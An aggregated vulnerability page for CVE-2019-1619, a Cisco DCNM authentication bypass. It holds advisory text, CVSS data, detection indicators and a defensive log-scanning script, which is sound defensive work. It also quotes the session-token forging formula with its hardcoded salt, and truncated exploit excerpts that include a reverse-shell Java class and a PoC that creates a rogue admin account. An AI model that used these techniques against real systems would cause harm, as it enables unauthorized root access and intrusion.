CVE-2019-1619
Published: 2019-06-27
Priority: P1 · 88 · Critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 82.82% (99.6th percentile)
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_data_center_network_manager | >= unspecified < 11.1(1) | 11.1(1) |
| cisco | data_center_network_manager | — | — |
| cisco | data_center_network_manager | — | — |
Detection & IOCs (extracted from sources)
- Other: MD5('admin' + sessionId + sysTime + 'POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF')
- Alert on unauthenticated POST requests to /fm/fileUpload containing multipart form fields 'fname', 'uploadDir', and a WAR file payload, indicative of CVE-2019-1620 exploitation chained after the CVE-2019-1619 auth bypass
- Detect unauthenticated GET requests to /fm/log/fmlogs.zip, used by attackers (CVE-2019-1622) to retrieve Tomcat/JBoss log paths needed for WAR upload directory targeting
- Flag HTTP 500 responses from both /fm/pmreport?token=<random> and /fm/fileUpload (GET with no params) as a fingerprinting/check step used by the exploit module
- Monitor for the hardcoded HMAC salt string 'POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF' appearing in HTTP traffic or process memory; its presence indicates active exploitation of the auth bypass
- Detect unauthenticated GET requests to /fm/fmrest/about/version, used by the exploit to fingerprint the DCNM version before selecting the appropriate attack path
- Note: the CVE-2019-1619 auth bypass only affects DCNM versions 10.4(2) and below; version 11.0(1) requires valid credentials for exploitation, and 11.1(1) does not require authentication via a different code path
- Note: version 11.0(1) requires authentication (valid USERNAME/PASSWORD) to exploit; the auth bypass token-forging technique applies only to 10.4(2) and below
- Note: the exploit module defaults to SSL/TLS on port 443; detections should also cover non-SSL deployments on alternate ports
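The request-pattern checks listed above can be run over web access logs. The following is an added example, not code from this page or from any vendor: it assumes combined-log-format lines from a proxy in front of DCNM, the indicator names are hypothetical, and the sample lines are constructed. An access log cannot show whether a session was legitimately authenticated, so the script flags the request patterns per client and leaves that correlation to the analyst.

```python
import re
from collections import defaultdict

# Combined-log-style access line; this format is an assumption about the proxy in front of DCNM.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(method, path, status):
    """Map one request to an indicator from the list above, or None."""
    base, _, query = path.partition("?")
    if method == "GET" and base == "/fm/fmrest/about/version":
        return "version_fingerprint"
    if method == "GET" and base == "/fm/log/fmlogs.zip":
        return "log_archive_download"
    if method == "GET" and base == "/fm/pmreport" and query.startswith("token=") and status == 500:
        return "check_probe"
    if method == "GET" and base == "/fm/fileUpload" and not query and status == 500:
        return "check_probe"
    if method == "POST" and base == "/fm/fileUpload":
        return "file_upload"
    return None

def scan(lines):
    """Return {client_ip: (severity, [indicators in the order seen])}."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        hit = classify(m["method"], m["path"], int(m["status"])) if m else None
        if hit:
            seen[m["ip"]].append(hit)
    report = {}
    for ip, hits in seen.items():
        upload_at = hits.index("file_upload") if "file_upload" in hits else -1
        # Probing followed by an upload from the same client matches the chained pattern.
        severity = "high" if upload_at > 0 else "medium" if upload_at == 0 else "low"
        report[ip] = (severity, hits)
    return report

# Constructed sample lines (documentation address ranges), not captured traffic.
SAMPLE = [
    '192.0.2.10 - - [27/Jun/2019:10:00:01 +0000] "GET /fm/fmrest/about/version HTTP/1.1" 200 120',
    '192.0.2.10 - - [27/Jun/2019:10:00:02 +0000] "GET /fm/log/fmlogs.zip HTTP/1.1" 200 48211',
    '192.0.2.10 - - [27/Jun/2019:10:00:05 +0000] "POST /fm/fileUpload HTTP/1.1" 200 15',
    '198.51.100.7 - - [27/Jun/2019:11:30:00 +0000] "GET /fm/pmreport?token=abc123 HTTP/1.1" 500 0',
    '198.51.100.7 - - [27/Jun/2019:11:30:01 +0000] "GET /fm/fileUpload HTTP/1.1" 500 0',
    '203.0.113.5 - - [27/Jun/2019:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, (severity, hits) in scan(SAMPLE).items():
        print(ip, severity, hits)
```
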
CVSS provenance
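| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_cisco | - | 9.8 | CRITICAL | - |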
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerability
vendor_cisco·2019-06-26·CVSS 9.8
CVE-2019-1619 [CRITICAL] CWE-284 Cisco Data Center Network Manager Authentication Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.
The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://s
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerability
vendor_cisco·CVSS 3.0
CVE-2019-1619 Cisco Data Center Network Manager Authentication Bypass Vulnerability
CVE-2019-1619: Cisco Data Center Network Manager Authentication Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device. Cisco has released software updates that address this vulnerability. There are no
CVSS: 3.0
CWE: CWE-284
Bug IDs: CSCvo64641
GHSA
GHSA-hv79-5q2x-qf8j: A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to b
ghsa_unreviewed·2022-05-24
CVE-2019-1619 [CRITICAL] GHSA-hv79-5q2x-qf8j: A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to b
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.
No detection rules found.
Exploit-DB
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
exploitdb·2020-02-06·CVSS 9.8
CVE-2019-15984 [CRITICAL] Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060
Example:
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! tem
Exploit-DB
Cisco Data Center Network Manager 11.2 - Remote Code Execution
exploitdb·2020-02-06·CVSS 9.8
CVE-2019-15975 [CRITICAL] Cisco Data Center Network Manager 11.2 - Remote Code Execution
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100
Notes:
Si.java needs to be compiled against Java 8 (the target used 1.8u201):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Si {
static{
try {
String host = "192.168.100.159";
int port = 1337;
String cmd =
Exploit-DB
Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)
exploitdb·2019-09-03·CVSS 9.8
CVE-2019-1622 [CRITICAL] Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
'Description' => %q{
DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
directory and achieve remote code execution as root.
This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
directory for the WAR file upload.
This module w
Metasploit
Cisco Data Center Network Manager Unauthenticated Remote Code Execution
metasploit·CVSS 9.8
CVE-2019-1619 [CRITICAL] Cisco Data Center Network Manager Unauthenticated Remote Code Execution
DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload. An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps directory and achieve remote code execution as root. This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct directory for the WAR file upload. This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why).
Metasploit
Cisco Data Center Network Manager Unauthenticated File Download
metasploit
DCNM exposes a servlet to download files on /fm/downloadServlet. An authenticated user can abuse this servlet to download arbitrary files as root by specifying the full path of the file. This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why).
References
- http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2019/Jul/7
- http://www.securityfocus.com/bid/108902
- https://seclists.org/bugtraq/2019/Jul/11
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
2019-06-27
Published